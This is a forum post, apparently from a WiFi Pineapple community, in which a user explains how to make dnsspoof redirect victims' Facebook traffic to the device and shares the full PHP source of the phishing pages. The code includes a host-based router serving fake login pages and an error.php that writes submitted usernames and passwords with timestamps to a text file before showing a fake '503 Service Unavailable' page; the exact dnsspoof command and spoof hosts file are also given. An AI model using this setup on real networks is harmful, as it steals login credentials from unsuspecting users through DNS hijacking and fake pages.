bigkielbasapl Posted December 27, 2013 Share Posted December 27, 2013 (edited) I had an issue where after starting dnsspoof through the infusions it would simply not work. pinging example.com would show as going to the pineapple on the victim PC, and best case scenario i would see www.example.com/example.html in the address bar however the page was blank and would not load. going straight to 172.16.42.1 loaded the page properly though after lots of different configurations and hours of messing around with the settings i found two main issues: 1. i found no way for dnsspoof to work through the pineapple GUI/by clicking on "start" in the infusions. I finally managed to get it to work by running this through PuTTY dnsspoof -i br-lan -f /etc/pineapple/spoofhost you can also run it without the -f expression, in that case it would simply redirect all traffic, rather than only what is specified in the host file. you can also specify an expression at the end to point to where you want a log file to be created. syntax: dnsspoof [-i interface] [-f hostsfile] [expression] 2. after doing this, it worked in IE and firefox (which i have installed for testing purposes). Chrome is my default browser however, and i had an add-on installed i completely forgot about which forces https whenever possible. so when i was typing facebook.com, it was changing it to the https version and thus, automatic failure. my pages: index.php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $skipInclude = 0;if (strpos($ref, "facebook")) { $phishFile = "facebook.html";}elseif (strpos($ref, "example")) { $phishFile = "example.htm";}else { require('redirect.php');$skipInclude = 1;}if ($skipInclude == 0) {include($phishFile);}?> redirect.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "twitter")) { header('Location: twitter.html'); } require('facebook.html'); ?> error.php <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <h1>503 Service Unavailable</h1> </body></html> spoofhost file: 172.16.42.1 *facebook.com so far i only have this configured to work with facebook for demo purposes, however ill be testing out some other websites. feels so good to see something load properly after investing so much time into trying to make it work! anyway just wanted to post my solution because this would've saved me so much time if i had known this earlier Edited December 27, 2013 by bigkielbasapl Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.